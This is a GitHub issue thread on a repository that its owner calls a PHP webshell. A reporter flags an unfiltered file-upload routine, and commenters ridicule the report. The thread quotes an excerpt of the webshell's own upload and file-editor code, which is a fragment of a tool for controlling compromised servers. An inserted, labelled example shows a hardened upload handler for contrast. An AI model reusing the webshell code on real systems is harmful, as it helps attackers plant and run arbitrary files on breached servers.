su18 / Stitch

PHP backend management system
174 stars 72 forks

File upload vulnerability #3

Open tianxiabingmadadudu opened 1 year ago

tianxiabingmadadudu commented 1 year ago

In the file stitch.php, on line 1467, there is no file suffix filtering. You can upload PHP files. File upload vulnerability!

```php
$file_name = isset($_FILES['upfile']['name']) ? $_FILES['upfile']['name'] : "";
$name      = isset($GLOBALS['_GET']['name']) ? Decrypt::run($GLOBALS['_GET']['name']) : "";

$pp = urlencode(dirname($this->p));

$result = <<<EOF
<script>
function utf16to8(str) {var out, i, len, c;out = "";len = str.length;for(i = 0; i < len; i++) {c = str.charCodeAt(i);if ((c >= 0x0001) && (c <= 0x007F)) {out += str.charAt(i);} else if (c > 0x07FF) {out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));} else {out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));}}return out;}
function utf8to16(str) {var out, i, len, c;var char2, char3;out = "";len = str.length;i = 0;while(i < len) {c = str.charCodeAt(i++);switch(c >> 4) {case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:out += str.charAt(i-1);break;case 12: case 13:char2 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));break;case 14:char2 = str.charCodeAt(i++);char3 = str.charCodeAt(i++);out += String.fromCharCode(((c & 0x0F) << 12) |((char2 & 0x3F) << 6) |((char3 & 0x3F) << 0));break;}}return out;}
function CheckDate(){var re = document.getElementById('mtime').value;var reg = /^\d{1,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}$/;var r = re.match(reg);var t = document.getElementById('charset').value;t = t.toLowerCase();if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}if(t=="gbk" || t=="gb2312"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}}document.getElementById('editor').submit();}
</script>
EOF;
if (!empty($GLOBALS['_POST']['upload'])) {
    $message_name = $file_name . ' ' . $this->msg[2];
    $content      = @copy($_FILES['upfile']['tmp_name'] , str_replace('//' , '/' , $this->p . '/' . $file_name)) ? $message_name : $this->msg[3];
    $url          = "?action=wjdc&path=" . base64_encode($this->p);
    HtmlOutput::tips($content , $url);
}
```
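
For contrast with the unfiltered `copy()` above, here is an added example (not code from the Stitch repository) of how a legitimate PHP upload handler restricts file suffixes; `UPLOAD_DIR`, `ALLOWED_EXT` and the helper names are assumptions for this illustration.

```php
<?php
// Added example, not from the Stitch repository. UPLOAD_DIR and ALLOWED_EXT
// are assumed values for this illustration.
const UPLOAD_DIR  = __DIR__ . '/uploads';
const ALLOWED_EXT = ['png', 'jpg', 'jpeg', 'gif', 'pdf'];
const ALLOWED_MIME = ['image/png', 'image/jpeg', 'image/gif', 'application/pdf'];

// Hardened upload: allowlist the suffix, verify the bytes, never reuse the
// client-supplied name. The issue's copy($_FILES[...]['tmp_name'], $dir.'/'.$name)
// does none of this, so any suffix (including .php) lands on disk unchanged.
function upload_hardened(array $file, string $dir): ?string {
    // Only accept a real upload that completed without error.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Suffix check against an explicit allowlist (case-insensitive).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Second check on the actual content, not the client's Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return null;
    }
    // Server-generated name: removes path traversal, overwrite and
    // multi-extension tricks, since none of the client's name survives.
    $target = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

if (isset($_FILES['upfile'])) {
    $saved = upload_hardened($_FILES['upfile'], UPLOAD_DIR);
    echo $saved === null ? 'upload rejected' : 'stored as ' . basename($saved);
}
```

The upload directory should additionally be configured in the web server so that nothing stored there is executed as script, regardless of suffix.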
su18 commented 1 year ago

Bro, take a good look: what I have here is a PHP webshell (大马).

Bronya-Rayi commented 1 year ago

LMAO, hunting for vulnerabilities inside a webshell.

1756816846 commented 1 year ago

Joke of the year.